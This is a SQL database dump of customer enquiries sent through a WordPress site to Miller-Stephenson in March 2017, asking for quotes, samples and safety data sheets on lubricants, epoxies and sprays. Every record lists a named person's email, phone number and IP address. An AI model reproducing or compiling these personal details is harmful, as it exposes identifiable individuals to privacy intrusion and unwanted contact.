INSERT INTO `wp_enquiry_detail_new` VALUES (656, 'Elvira Vogel', 'e.vogel@tracoe.com', 'Dear Sir or Madame,\nI need an Inquiry for the product MS-122XD. Could you please send me the minimum purchase, the delivery- and payment conditions and the Price ?\nIf you have questions don´t hesitate to contact me.\nBest regards,\nElvira Vogel\nTRACOE medical GmbH\nGermany\n\n', '+4961369169122', 'Inquiry', '80.152.11.22', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:4:"1681";s:5:"title";s:8:"MS-122XD";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:92:"https://www.miller-stephenson.com/wp-content/uploads/2016/09/ms-122xd-dry-film-lubricant.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-03-16 13:00:03', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (657, 'Matt Curry', 'mcurry@hriracing.com', 'We are looking to purchase 1 tub that is 0.5KG of this product. Could you please email the pricing for this tub. Thank you.\n\nBest Regards,\n      Matt', '317730-7815', 'GPL 215 Pricing', '99.138.52.10', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:3:"822";s:5:"title";s:7:"GPL 215";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:86:"https://www.miller-stephenson.com/wp-content/uploads/2016/08/shutterstock_60848668.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-03-16 13:18:24', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (658, ' Oppenhimer', 'ProfOppenheimer@gmail.com', 'looking for teflon spray in Baltimore, MD area.', '410837-4200', 'local availability?', '74.11.209.35', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:4:"1801";s:5:"title";s:16:"Teflon Multi-Use";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:83:"https://www.miller-stephenson.com/wp-content/uploads/2016/09/teflon-multi-use-1.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-03-16 13:57:11', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (659, 'Erik Morris', 'emorris@kcp.com', 'Hi I would like to receive a quote for the purchase of Vertrel XF in a size less than or equal to 1 quart.\n\nThanks.', '816488-6720', 'Price Quote for Vertrel XF', '199.89.130.52', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:4:"1278";s:5:"title";s:10:"Vertrel XF";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:75:"https://www.miller-stephenson.com/wp-content/uploads/2016/09/vertrel-xf.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-03-16 13:59:07', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (660, 'Jon Byrd', 'jbyrd@gntc.edu', 'I instruct at a two-year college in an FAA-certificated Aviation Maintenance Technology program. We use Cindy Foreman from CES\'s Advanced Composites projects. We need to order a supply of Epon 828 and 3140 system. Thank you much in advance for your time and support.', '706802-5086', '828 and 3140', '70.148.248.202', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:3:"877";s:5:"title";s:11:"EPON™ 828";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:73:"https://www.miller-stephenson.com/wp-content/uploads/2016/08/EPON-828.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-03-16 14:19:45', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (661, 'Rick Cespedes', 'rick@tagint.com', 'Requesting pricing and availability on MS-907 Two-Part Epoxy Adhesive', '650596-0130', 'RFQ - MS-907', '162.200.109.39', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:4:"1149";s:5:"title";s:30:"MS-907 Two-Part Epoxy Adhesive";s:5:"price";s:0:"";s:5:"quant";s:2:"10";s:3:"img";s:71:"https://www.miller-stephenson.com/wp-content/uploads/2016/09/MS-907.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-03-16 15:41:13', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (662, 'Paul Eaton', 'paul@southeastnuclear.com', 'like to order and find our safe handling practices ', '678762-0192', 'MS-111', '104.36.189.208', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:4:"1152";s:5:"title";s:28:"MS-111 Epoxy Stripping Agent";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:87:"https://www.miller-stephenson.com/wp-content/uploads/2016/09/MS-111-EPOXY-STRIPPING.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-03-16 16:37:01', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (663, 'Teresa Havens', 'teresa@cudacomposites.com', 'Would like a quote for this product.', '937499-0360', '', '174.103.148.47', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:4:"1726";s:5:"title";s:24:"Antistatic Quik-Freeze®";s:5:"price";s:0:"";s:5:"quant";s:2:"12";s:3:"img";s:88:"https://www.miller-stephenson.com/wp-content/uploads/2016/09/quik-freeze-anti-static.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-03-16 21:17:23', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (664, 'Jim Dufresne ', 'Jamesdufresnejr@yahoo.com', 'Price please ', '', 'Price please ', '66.87.137.241', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:4:"1851";s:5:"title";s:14:"Cobra® Duster";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:76:"https://www.miller-stephenson.com/wp-content/uploads/2016/09/COBRA-BRUSH.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-03-16 23:11:05', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (665, 'Andreas Waeber', 'andreas.waeber@wsi.tum.de', 'Can you please provide me with a quotation for a quart of the EPON resin 1002F including shipment to Germany?', '+498928911584', 'Quotation', '129.187.9.1', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:3:"937";s:5:"title";s:13:"EPON™ 1002F";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:75:"https://www.miller-stephenson.com/wp-content/uploads/2016/08/EPON-1002F.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-03-17 09:58:13', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (666, 'Cynthia', 'aaiorders@ultratec.com', 'I would like a quote for 2 tubes of grease. Would also like to know if there is an email address that purchase orders should be sent to and if there is a contact for Ultratec.\nThank You', '608238-3082', 'Quote ', '71.87.10.2', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:3:"696";s:5:"title";s:7:"XHT-BDZ";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:86:"https://www.miller-stephenson.com/wp-content/uploads/2016/08/shutterstock_68906731.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-03-17 13:49:30', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (667, 'Teresa Havens', 'teresa@cudacomposites.com', 'Please provide price quote for this product', '937499-0360', 'price quote', '174.103.148.47', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:4:"1719";s:5:"title";s:21:"Quik-Freeze® MS-242N";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:76:"https://www.miller-stephenson.com/wp-content/uploads/2016/09/quik-freeze.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-03-17 14:17:19', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (668, 'Aya Dichari', 'adichari@bci-emea.com', 'To whom it may concern, \n\nBCI Holding SA is a leading multi-region producer of polyester polyols, polyurethane systems and specialty adhesives with a focus on the EMEA region (Europe, Middle East and Africa). \n\nKindly send me a sample of the item Epon 1002F to our UAE branch. \n\nAlso, kindly send me a quotation price based on the below: \n- Quantity: 1 container\n- Delivery terms: CIF SHarjah - UAE\n- Shipment: End of April. \n\nAwaiting your soonest reply. Thank you in advance. \n', '', '', '195.112.196.13', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:3:"937";s:5:"title";s:13:"EPON™ 1002F";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:75:"https://www.miller-stephenson.com/wp-content/uploads/2016/08/EPON-1002F.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-03-17 14:50:38', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (669, 'Aya Dichari', 'adichari@bci-emea.com', 'To whom it may concern, \n\nBCI Holding SA is a leading multi-region producer of polyester polyols, polyurethane systems and specialty adhesives with a focus on the EMEA region (Europe, Middle East and Africa). \n\nKindly send me a sample of the item Epon 1002F to our UAE branch. \n\nAlso, kindly send me a quotation price based on the below: \n- Quantity: 1 container\n- Delivery terms: CIF SHarjah - UAE\n- Shipment: End of April. \n\nAwaiting your soonest reply. Thank you in advance. \n', '', '', '195.112.196.13', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:3:"937";s:5:"title";s:13:"EPON™ 1002F";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:75:"https://www.miller-stephenson.com/wp-content/uploads/2016/08/EPON-1002F.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-03-17 14:51:03', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (670, 'Bryan Lundberg', 'Bryan.Lundberg@talenenergy.com', 'Would like a quote on six tubes, expedited shipping and handling. Need price and lead time.', '570664-1131', 'Need tubes of Krytox XHT-BDZ', '12.172.17.50', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:3:"696";s:5:"title";s:7:"XHT-BDZ";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:86:"https://www.miller-stephenson.com/wp-content/uploads/2016/08/shutterstock_68906731.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-03-19 15:53:03', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (671, 'Gary Carlson', 'gary.carlson@jetsuite.com', 'I wish to get a price quote for 2 oz. tube of Krytox 8900.', '661524-1715', 'Price for Krytox lube', '107.77.231.129', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:3:"868";s:5:"title";s:8:"NRT 8900";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:86:"https://www.miller-stephenson.com/wp-content/uploads/2016/08/shutterstock_60087109.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-03-19 18:49:34', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (672, 'Amy Kaczmarowski', 'akaczma@sandia.gov', 'Do you offer any samples of this product?', '505844-2355', 'Samples', '198.102.155.100', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:3:"887";s:5:"title";s:11:"EPON™ 862";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:73:"https://www.miller-stephenson.com/wp-content/uploads/2016/08/EPON-862.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-03-20 15:16:22', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (673, 'David Warren', 'd.warren@cefindustries.com', 'Hello -  would like pricing options for EPIKURE 3125.   Gallon preferably', '630628-4696', 'RFQ   Epikure 2125', '50.193.66.217', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:4:"1866";s:5:"title";s:15:"EPIKURE™ 3125";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:77:"https://www.miller-stephenson.com/wp-content/uploads/2016/09/EPIKURE-3125.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-03-20 19:04:12', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (674, 'Corey Gloede', 'corey.gloede@utas.utc.com', 'Hello,\nI am looking to get MS-242L set up in our shop but need a copy of the (M)SDS to review with our EH&amp;S manager.\nCan you send a copy to me?\nThank you,\nCorey', '425923-1835', 'MSDS (SDS) for MS-242L', '192.249.47.211', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:4:"2788";s:5:"title";s:27:"MS-242L Quik-Freeze® Ultra";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:87:"https://www.miller-stephenson.com/wp-content/uploads/2016/10/shutterstock_444780952.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-03-20 19:54:40', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (675, 'David Fox', 'david.fox@orbitalatk.com', 'To whom it may concern,\n\nI am interested in using your MS-143XD product in a new mold arrangement we are developing. I was curious if miller-Stephenson could provide a sample of the MS-143XD to test on a mold?\n\nThank You,\n\nDavid Fox\n410.392.1346\ndavid.fox@orbitalatk.com', '410392-1346', 'MS-143XD Product Sample', '192.107.246.16', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:3:"306";s:5:"title";s:8:"MS-143XD";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:73:"https://www.miller-stephenson.com/wp-content/uploads/2016/08/MS-143XD.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-03-20 20:02:01', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (676, 'dave arney', 'dave@aic-coatings.com', 'Looking for information', '', '', '66.52.122.90', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:3:"469";s:5:"title";s:30:"Fluoropolymer Medical Coatings";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:105:"https://www.miller-stephenson.com/wp-content/uploads/2016/08/Fluoropolymer-coating-Catheter-guidewire.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-03-20 21:04:35', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (677, 'Adam ', 'adam.devries@cobham.com', 'Can you please advise the replacement for MS-143H ', '+610881547160', 'I heard its no longer procurable ', '103.25.114.250', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:3:"303";s:5:"title";s:8:"MS-143TE";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:73:"https://www.miller-stephenson.com/wp-content/uploads/2016/08/MS-143TE.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-03-20 22:40:10', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (678, 'Melissa Muenzberg', 'melissa.muenzberg@l3t.com', 'Can you please provide a quote including price, lead time and your payment terms for qty 72 of your p/n:  MS260?  Thanks!  Melissa', '817619-5984', 'RFQ-103504', '128.170.224.12', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:4:"1338";s:5:"title";s:42:"MS-260 Plastic, Glass &#038; Metal Cleaner";s:5:"price";s:0:"";s:5:"quant";s:2:"72";s:3:"img";s:72:"https://www.miller-stephenson.com/wp-content/uploads/2016/09/cleaner.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-03-21 12:48:51', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (679, 'Michaela Reiser - AVMATS', 'mhreiser@avmats.com', 'please quote p&amp;a for 1ea tube.\nThanks.', '636812-3324', 'Krytox 240AB  2oz', '71.86.38.114', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:3:"643";s:5:"title";s:5:"240AB";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:86:"https://www.miller-stephenson.com/wp-content/uploads/2016/08/shutterstock_92852002.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-03-21 14:20:02', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (680, 'Dan Wallander', 'Dan.Wallander@aurizonultrasonics.com', 'I\'m Looking for a conductive grease for needle small bearings.  I would appreciate any conductivity ratings, specification data, or other available  information and pricing you can provide for a quantity of approx 6oz.  Or whatever available size there might be.       ', '920750-5080', 'Conductive Grease', '98.103.186.114', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:4:"1088";s:5:"title";s:7:"GPL 246";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:82:"https://www.miller-stephenson.com/wp-content/uploads/2016/08/krytox-gpl-grease.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-03-21 16:52:30', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (681, 'CINDY MCDANIEL', 'GINGER@BURKEPRODUCTS.COM', '1 BOX OR 12 CANS', '937372-3516', 'RFQ', '99.70.206.6', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:4:"1677";s:5:"title";s:8:"MS-122AD";s:5:"price";s:0:"";s:5:"quant";s:2:"12";s:3:"img";s:92:"https://www.miller-stephenson.com/wp-content/uploads/2016/09/ms-122ad-dry-film-lubricant.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-03-21 18:02:50', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (682, 'Janet Baucom', 'baucomjm@ornl.gov', 'Please send me the price for Miller-Stephenson aeroduster MS-222T or MS-222N.', '865574-5794', 'Aeroduster', '160.91.60.239', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:3:"489";s:5:"title";s:20:"AeroDuster® MS-222N";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:77:"https://www.miller-stephenson.com/wp-content/uploads/2016/08/aero-dusters.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-03-21 19:16:59', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (683, 'Andrew Smith', 'asmith@xppower.com', 'What is the cost and minimum order for MS-122ADL or comparable spray release? ', '', 'Mold Release', '50.73.51.125', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:4:"2763";s:5:"title";s:9:"MS-122ADL";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:87:"https://www.miller-stephenson.com/wp-content/uploads/2016/10/shutterstock_318864752.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-03-21 20:14:11', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (684, 'Peter Wong', 'peter@si-forest.com', 'Hello,\nWho are your distributors for the MS-470C?\n\nThanks\nPeter', '360448-4908', 'Distributors for MS-470C', '70.90.130.61', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:3:"735";s:5:"title";s:7:"MS-470C";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:72:"https://www.miller-stephenson.com/wp-content/uploads/2016/09/MS-470C.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-03-21 21:51:13', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (685, 'Danny Li', 'ql577@nyu.edu', 'What is the cost of 1 can?', '347712-3269', 'Cost of 1 item', '71.183.204.83', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:3:"621";s:5:"title";s:7:"MS-475C";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:72:"https://www.miller-stephenson.com/wp-content/uploads/2016/09/MS-475C.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-03-22 02:17:52', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (686, 'Jason Grochmal', 'jason.grochmal@digisonde.com', 'Hi,\n  I would like pricing on epon 828 smallest size available (quart?)\nand 3 cans of vertrel spray (12oz?)', '508320-5802', 'Epon 828', '173.162.229.10', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:3:"877";s:5:"title";s:11:"EPON™ 828";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:73:"https://www.miller-stephenson.com/wp-content/uploads/2016/08/EPON-828.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-03-22 12:40:00', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (687, 'Jason Grochmal', 'jason.grochmal@digisonde.com', 'Hi,\n  I would like pricing on epon 828 smallest size available (quart?)\nand 3 cans of vertrel spray (12oz?)', '508320-5802', 'Epon 828', '173.162.229.10', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:3:"877";s:5:"title";s:11:"EPON™ 828";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:73:"https://www.miller-stephenson.com/wp-content/uploads/2016/08/EPON-828.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-03-22 12:40:45', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (688, 'Ian Burnay', 'ian.burney@ngc.com', 'Hello,\n\nI am looking for a dry film lubricant to place on some stainless steel shoulder screws that are currently galling.  Do you know if this product would this product be suitable for our application? If so, how much do you charge for 1 can, 10 cans, and 100 cans?\n\nThank you,\n\nIan Burney', '858592-3984', 'Requesting quote', '157.127.124.157', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:4:"1677";s:5:"title";s:8:"MS-122AD";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:92:"https://www.miller-stephenson.com/wp-content/uploads/2016/09/ms-122ad-dry-film-lubricant.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-03-22 14:32:51', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (689, 'Ian Burney', 'ian.burney@ngc.com', 'Hello, I am looking for a dry film lubricant to place on some stainless steel shoulder screws that are currently galling. Do you know if this product would this product be suitable for our application? If so, how much do you charge for 1 can, 10 cans, and 100 cans? Thank you, Ian Burney', '858592-3984', 'Stainless Steel Screw Galling', '157.127.124.157', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:3:"182";s:5:"title";s:8:"MS-122AV";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:75:"https://www.miller-stephenson.com/wp-content/uploads/2016/08/Automotive.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-03-22 14:48:41', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (690, 'Miguel Rodriguez', 'mrodriguez@rapidtpc.com', 'Hello,\n\nWe are interested on trying your MS-122SE mold release for a Thermoplastic Composite application with PC. We have tried MS-122AD with good results but will like to try MS-122SE too. Where can we purchase this? A quick google search did not show anything. We are located in Pittsburgh PA. ', '908342-6611', 'Distributor', '72.95.220.4', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:3:"302";s:5:"title";s:8:"MS-122SE";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:83:"https://www.miller-stephenson.com/wp-content/uploads/2016/08/MS-122SE-Aerospace.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-03-22 15:54:58', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (691, 'Mark Stalter', 'mark.stalter@bench.com', 'Hello,\nPlease provide me with a quote for the above Krytox grease.\nPlease advise MOQ, price and leadtime.\nRegards,\nMark\n', '805222-1328', 'Quote Request 240AC, 8oz tubes', '63.96.200.68', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:3:"644";s:5:"title";s:5:"240AC";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:87:"https://www.miller-stephenson.com/wp-content/uploads/2016/08/shutterstock_125931485.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-03-22 18:44:19', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (692, 'Bing Yu', 'bing.yu@marquette.edu', 'Hi,\n\nCan you send me a quote for the MS-907 epoxy?\n\nThanks,\nBing', '414288-3251', 'Quote for MS-907', '134.48.165.52', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:4:"1149";s:5:"title";s:30:"MS-907 Two-Part Epoxy Adhesive";s:5:"price";s:0:"";s:5:"quant";s:1:"2";s:3:"img";s:71:"https://www.miller-stephenson.com/wp-content/uploads/2016/09/MS-907.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-03-22 21:12:19', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (693, 'Rachelle Byrd', 'rachelle.byrd@simco.com', 'Please provide a quote for P/N MS-730. We will also need the wands for these. Thank you!', '202969-2827', 'RFQ for Contact Re-Nu', '23.25.106.41', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:4:"2800";s:5:"title";s:23:"MS-730L Contact Re-Nu®";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:87:"https://www.miller-stephenson.com/wp-content/uploads/2016/10/shutterstock_486488371.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-03-22 21:49:48', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (694, 'Yi Zhao', 'yzhao@envisiontec.com', 'Dear Sir/Madame, I am a senior chemist in a 3D printing company EnvisionTEC Inc.  I would like to have samples for Epicure W and Epon828. Is it possible to provide me some for my new formulations. If not, kindly send me the quotation for 500 g each. Thanks and Best Regards. Yi Zhao', '', 'Epicure W and Epon828', '45.72.195.195', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:4:"1059";s:5:"title";s:12:"EPIKURE™ W";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:76:"https://www.miller-stephenson.com/wp-content/uploads/2016/08/EPIKURE-W-1.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-03-22 23:47:35', '', NULL, '', '', '', NULL, '', ''); 
